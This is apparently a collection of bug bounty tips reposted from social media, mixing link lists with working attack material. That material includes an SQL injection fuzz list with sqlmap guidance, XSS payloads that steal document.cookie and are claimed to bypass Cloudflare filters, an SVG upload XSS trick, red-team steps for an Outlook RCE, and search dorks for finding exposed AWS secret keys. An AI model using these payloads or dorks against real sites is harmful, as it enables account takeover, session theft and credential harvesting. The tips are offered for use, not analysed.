Bug bounty Tips

' " "' ' " '" ''' . / \ %5c %27 %22 %23 %3B %27%22%60 %22%27 %27%20%22 %27%22 %27%27%27 ) ") ') )) ")) ')) ))) # ; '' ` , "" // \\ % %00 || 0.or-1%23 'or-1%23 %2F %5C %29 %22%29 %27%29 %29%29 %22%29%29 %27%29%29 %27%27 %60 %60%60 %2C %22%22 %2F%2F %5C%5C %7C%7C 28 % %2A%7C //* %7C 29 % ( */* | %' %" * *)(& *)(|(& *)(|(* *))%00 -'

How you test error based sql injection ? by putting ' " # ; ? in param ? there are lots of method to test just use this list and try in intruder or any other oneliner bcz normaly developer block or filter ' " these and if you get any error try sqli with ghauri and sqlmap and manually in burp to confirm more..

18 Websites To Learn Linux For FREE 1. nixCraft 2. Tecmint 3. Linuxize 4. It’s FOSS 5. Linux Hint 6. LinuxOPsys 7. Linux Journey 8. Linux Academy 9. Linux Survival 10. Linux Command 11. Ryan’s Tutorials 12. Linux Handbook 13. Linux FoundationX 14. LabEx Linux For Noobs 15. Guru99 Linux Tutorial Summary 16. Conquering the command line 17. Intellipat Linux Tutorial for Beginners 18. The Debian Administrators Handbook

(Hard filter+Cloudflare bypassed) Stored XSS leads account takeover Payload: xyz';"/></textarea><Img Src=OnXSS OnError=prompt(document.cookie)> Tips: Always play with input's => reflecting value's tags. even there is waf/cloudflare. #bugbountytip #bugbounty

Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image file. Helpful for bypassing CSP or bypassing servers that strip strings. Many file uploads allow SVGs and are prone to tampering. <svg width="600" height="400" xmlns="w3.org/2000/svg" xmlns:xhtml="w3.org/1999/xhtml"> <foreignObject width="100%" height="100%"> <body xmlns="w3.org/1999/xhtml"> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>

this is a image on how to identify a template injection

New XSS Bypass Cloudflare WAF 🧱 Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E

🏭 We've tested the new RCE in Microsoft Outlook (CVE-2024-21378) in a production environment and confirm it works well! A brief instruction for red teams: 1. Compile our enhanced DLL; 2. Use NetSPI's ruler and wait! No back connect required! 🔥 📐📏

You can see all the different payloads athttps://t.co/A5EjVwBjq1

■■■■■ DEF CON 29 Main Stage Presentations: 1-Babak Javadi, Nick Draffen, Eric Bettse, Anze Jensterle - The PACS man Comes For Us All https://www.youtube.com/watch?v=NARJrwX_KFY 2-Reza Soosahabi, Chuck McAuley - SPARROW: A Novel Covert Communication Scheme https://www.youtube.com/watch?v=oaLIo9HwW-g 3-Tomer Bar, Eran Segal - 2021 Our Journey Back To The Future Of Windows Vulnerabilities https://www.youtube.com/watch?v=VxNi5pVDZU0 4-Sick Codes - The Agricultural Data Arms Race Exploiting a Tractor Load of Vulns https://www.youtube.com/watch?v=zpouLO-GXLo 5-Shir Tamari, Ami Luttwak - New class of DNS Vulns Affecting DNS-as-Service Platforms https://www.youtube.com/watch?v=72uzIZPyVjI 6-Sheila A Berta - The Unbelievable Insecurity of the Big Data Stack https://www.youtube.com/watch?v=vl9hk4fQdos 7-Roy Davis - No Key No PIN No Combo No Problem Pwning ATMs For Fun and Profit https://www.youtube.com/watch?v=9cG-JL0LHYw 8-Rotem Bar - Abusing SAST tools When scanners do more than just scanning https://www.youtube.com/watch?v=Jl-CU6G4Ofc 9-Richard Thieme AKA neuralcowboy - UFOs: Misinformation, Disinfo, and the Basic Truth https://www.youtube.com/watch?v=mExktWB0qz4 10-Richard Henderson - Old MacDonald Had a Barcode, E I E I CAR https://www.youtube.com/watch?v=cIcbAMO6sxo 11-Rex Guo, Junyuan Zeng - Phantom Attack: Evading System Call Monitoring https://www.youtube.com/watch?v=yaAdM8pWKG8 12-Paz Hameiri - TEMPEST Radio Station https://www.youtube.com/watch?v=m9WkEwshNKc 13-Patrick Wardle - Bundles of Joy: Breaking MacOS via Subverted Applications Bundles https://www.youtube.com/watch?v=raSTgFqYaoc 14-PatH - Warping Reality: Creating and Countering the Next Generation of Linux Rootkits https://www.youtube.com/watch?v=g6SKWT7sROQ 15-Orange Tsai - ProxyLogon Just Tip of the Iceberg, New Attack Surface on Exchange Server-@onhex_ir https://www.youtube.com/watch?v=5mqid-7zp8k 16-Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic https://www.youtube.com/watch?v=6AsVUS79gLw 17-Mars Cheng, Selmon Yang - Taking Apart and Taking Over ICS & SCADA Ecosystems https://www.youtube.com/watch?v=L0w_aE4jRFw 18-Laura Abbott, Rick Altherr -Breaking TrustZone M: Privilege Escalation on LPC55S69 https://www.youtube.com/watch?v=eKKgaGbcq4o 19-Justin Perdok - Hi Im DOMAIN Steve, Please Let Me Access VLAN2 https://www.youtube.com/watch?v=lDCoyxIhTN8 20-Jenko Hwong - New Phishing Attacks Exploiting OAuth Authentication Flows https://www.youtube.com/watch?v=9slRYvpKHp4 21-Jeff Dileo - Instrument and Find Out: Parasitic Tracers for High Level Languages https://www.youtube.com/watch?v=Iy1BNywebpY 22-James Kettle - HTTP2: The Sequel is Always Worse https://www.youtube.com/watch?v=rHxVVeM9R-M 23-Jacob Baines - Bring Your Own Print Driver Vulnerability https://www.youtube.com/watch?v=vdesswZYz-8 24-Ian Coldwater, Chad Rikansrud - Real Life Story of the 1st Mainframe Container Breakout https://www.youtube.com/watch?v=7DXF7YDBf-g 25-hyp3ri0n aka Alejandro Caceres Jason Hopper - PunkSPIDER and IOStation: Making a Mess-@onhex_ir https://www.youtube.com/watch?v=DlS_sl4hTWg 26-Hao Xing, Zekai Wu - How I use a JSON 0day to Steal Your Money on the Blockchain https://www.youtube.com/watch?v=pUexrXOGCkE 27-David Dworken - Worming through IDEs https://www.youtube.com/watch?v=pzqu_qaoNuY 28-Cory Doctorow - Privacy Without Monopoly https://www.youtube.com/watch?v=deRRR5B1hwI 29-Christopher Wade - Breaking Secure Bootloaders https://www.youtube.com/watch?v=z4gIxdFfJDg 30-Chad Seaman - UPnProxyPot: Fake the Funk, Become a Blackhat Proxy, MITM their TLS... https://www.youtube.com/watch?v=mHCGNUsrTf0 31-Brian Hong - Sleight of ARM: Demystifying Intel Houdini https://www.youtube.com/watch?v=9oQ5XjA1aq0 32-Bill Graydon - Defeating Physical Intrusion Detection Alarm Wires https://www.youtube.com/watch?v=Liz9R_QxSgk 33-Ben Kurtz - Offensive Golang Bonanza: Writing Golang Malware https://www.youtube.com/watch?v=3RQb05ITSyk

FROM INTERNET 1)SSD Advisory – TOTOLINK LR1200GB Auth Bypass https://ssd-disclosure.com/ssd-advisory-totolink-lr1200gb-auth-bypass/ 2)CTF-200-03 Offsec Proving Grounds Practice Labor Day CTF Machine Walkthrough https://medium.com/@0xrave/ctf-200-03-offsec-proving-grounds-practice-labor-day-ctf-machine-walkthrough-1f3517fb4250 3)Pickle Rick CTF Tryhackme Walkthrough https://medium.com/@kirimichris7/pickle-rick-ctf-tryhackme-walkthrough-2e964a8d90a7 4)Quick https://medium.com/@josemlwdf/quick-49ed72075be6 5)Sans 2023 Holiday Hack Challenge https://medium.com/@polkalots1/sans-2023-holiday-hack-challenge-8ee6791fa61e 6)AmateursCTF 2023 Reverse Challenges https://medium.com/@mohammadolimat/amateursctf-2023-reverse-challenges-760273d72246 7)Arab Regional Cybersecurity CTF 2023 reverse challenges https://medium.com/@mohammadolimat/arab-regional-cybersecurity-ctf-2023-reverse-challenges-cd6265565256 8)Mastering CTFs: Essential Tools for Every Challenge https://medium.com/@bu19akov/mastering-ctfs-essential-tools-for-every-challenge-da45b78e4ccb 9)How to Use AI Prompting for Security Vulnerabilities https://www.hackerone.com/ai/how-to-use-ai-prompting

#Offensive_security Lord Of The Ring0 Part 1 - Introduction: https://idov31.github.io/posts/lord-of-the-ring0-p1 Part 2 - A tale of routines, IOCTLs and IRPs: https://idov31.github.io/posts/lord-of-the-ring0-p2 Part 3 - Sailing to the land of the user: https://idov31.github.io/posts/lord-of-the-ring0-p3 Part 4 - The call back home: https://idov31.github.io/posts/lord-of-the-ring0-p4 Part 5 - Saruman's Manipulation: https://idov31.github.io/posts/lord-of-the-ring0-p5 Part 6 - Conclusion: https://idov31.github.io/posts/lord-of-the-ring0-p6

𝗔𝗪𝗦 𝗢𝗦𝗜𝗡𝗧 𝗯𝘆 𝗗𝗼𝗿𝗸𝗶𝗻𝗴 🎩 =Shodan Dorks html:"AWS_ACCESS_KEY_ID" html:"AWS_SECRET_ACCESS_KEY" html:"AWS_SESSION_TOKEN" title:"AWS S3 Explorer" html:"AWS Elastic Beanstalk overview" html:"OpenSearch Dashboards" "X-Amz-Server-Side-Encryption" title:"EC2 Instance Information" http.title:"Amazon Cognito Developer Authentication Sample" "Server: EC2ws" title:"AWS X-Ray Sample Application" html:"Amazon EC2 Status" html:"AWS EC2 Auto Scaling Lab" html:"istBucketResult" =Search Engine Dorks site:.s3.amazonaws.com "Company" site:http://s3.amazonaws.com intitle:index.of.bucket “” site:s3.amazonaws.com "index of /" s3 site:amazonaws.com filetype:xls password inurl:gitlab "AWS_SECRET_KEY" inurl:pastebin "AWS_ACCESS_KEY" inurl:s3.amazonaws.com intitle:"AWS S3 Explorer" =Github Dorks Key:amazon_secret_access_key amazonaws aws_access aws_access_key_id aws_bucket aws_key aws_secret aws_secret_key aws_token bucket_password bucketeer_aws_access_key_id bucketeer_aws_secret_access_key cache_s3_secret_key cloud_watch_aws_access_key filename:credentials aws_access_key_id filename:s3cfg lottie_s3_api_key lottie_s3_secret_key rds.amazonaws.com password s3_access_key s3_access_key_id s3_key s3_key_app_logs s3_key_assets s3_secret_key sandbox_aws_access_key_id sandbox_aws_secret_access_key secret_key eureka.aws secretkey filename:.bash_profile aws filename:.s3cfg

Integrating GPT Into Command Line :- by @devil_anon

This would be a text based guide because making a video about this would be too short and unnecessary.

1. Install shell-gpt and jq for debian users :-

sudo apt install jq

for arch users :-

sudo pacman -S jq

next :-

pip install shell-gpt

2. type sgpt into your terminal, then input your API key from your profile after signing up at openai.com

3. Usage. In order to ask simple question prompts use sgpt "your question here" then click enter (make sure the quote is on the question). and for guide on tools usage, use ; sgpt --chat toolname --shell "question here regarding the tool in order to bring up a command" Example. sgpt --chat nmap --shell "what's the command to scan ip 10.76.xx.xx and enumerate all protocols running on it" sgpt would then return back a command regarding what you asked.